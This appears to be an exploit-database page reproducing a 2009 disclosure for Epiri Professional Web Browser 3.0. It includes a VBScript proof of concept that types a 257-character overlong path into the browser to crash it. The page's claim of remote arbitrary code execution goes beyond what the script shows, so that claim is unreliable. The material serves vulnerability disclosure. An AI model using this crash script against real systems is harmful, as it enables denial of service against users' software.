header-logo
Suggest Exploit
vendor:
Epiri Professional Web Browser
by:
Gjoko 'LiquidWorm' Krstic
9,3
CVSS
HIGH
Remote Crash Exploit
119
CWE
Product Name: Epiri Professional Web Browser
Affected Version From: 3.0.0.00
Affected Version To: 3.0.0.00
Patch Exists: Yes
Related CWE: N/A
CPE: a:horizon:epiri_professional_web_browser:3.0.0.00
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows XP Professional SP3 (En)
2009

Epiri Professional Web Browser 3.0 Remote Crash Exploit

Epiri Professional Web Browser 3.0 is vulnerable to a remote crash exploit. The vulnerability is triggered when a malicious user sends a specially crafted string of 257 characters to the application. This causes the application to crash and can be exploited to execute arbitrary code.

Mitigation:

Users should update to the latest version of Epiri Professional Web Browser 3.0 to mitigate this vulnerability.
Source

Exploit-DB raw data:

' Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit

' Vendor: Horizon
' Product Web Page: http://www.horizonum.com/
' Current Version: 3.0.0.00
' Notiz: Microsoft Silverlight
' Vulnerable Mode: Browse Internet
' Tested On Microsoft Windows XP Professional SP3 (En)

' Vulnerable strings:

' file://
' C::
' C:\AAAA...AAAA [257]
'

' Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
' liquidworm gmail com
' http://www.zeroscience.org/
' 28.07.2009


' Working PoC: http://zeroscience.org/codes/epiri_crash.vbs

Dim crash

Set crash = CreateObject("WScript.Shell")

With crash

Do Until Success = True

Success = crash.AppActivate("Epiri Professional 3.0")

Loop

'.SendKeys "file://"
'.SendKeys "C::"
.SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

.SendKeys "~" 'Return

End With

Wscript.Quit

# milw0rm.com [2009-07-30]

Navigation

Suggest Exploit

Services By CQR